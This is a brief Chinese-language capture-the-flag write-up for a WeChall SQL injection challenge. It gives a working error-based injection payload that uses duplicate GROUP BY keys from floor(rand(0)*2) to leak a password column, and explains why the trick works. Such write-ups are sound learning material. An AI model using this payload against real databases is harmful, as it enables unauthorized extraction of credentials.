http://www.wechall.net/challenge/Mawekl/light_in_the_darkness/index.php
这道题的错误会回显,而且限制要在2次query内得到答案,所以用error based:
' or (select count(*) from information_schema.tables group by concat(password,floor(rand(0)*2)))--
至于为什么这样会出错,可以看这里:
http://stackoverflow.com/questions/11787558/sql-injection-attack-what-does-this-do
简单地说,floor(rand(0)*2)会得到0,1,1,0……第2个和第3个重复的1会造成重复的group_key。而且我们需要一个行数大于3的表,所以选择information_schema